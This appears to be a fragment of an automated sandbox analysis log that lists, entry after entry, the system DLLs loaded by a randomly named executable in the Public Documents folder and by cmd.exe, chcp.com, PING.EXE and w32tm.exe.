Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mscoree.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: version.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: uxtheme.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.storage.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wldp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: profapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptsp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rsaenh.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: cryptbase.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sspicli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ktmw32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wbemcomn.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: amsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: userenv.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dnsapi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winnsi.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasapi32.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasman.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rtutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: mswsock.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: winhttp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: rasadhlp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: propsys.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: apphelp.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: dlnashext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wpdshext.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: edputil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: urlmon.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: iertutil.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: srvcli.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: netutils.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: wintypes.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: appresolver.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: bcp47langs.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: slc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: sppc.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\Public\Documents\GSwhJpqdkmruXxiphyV.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
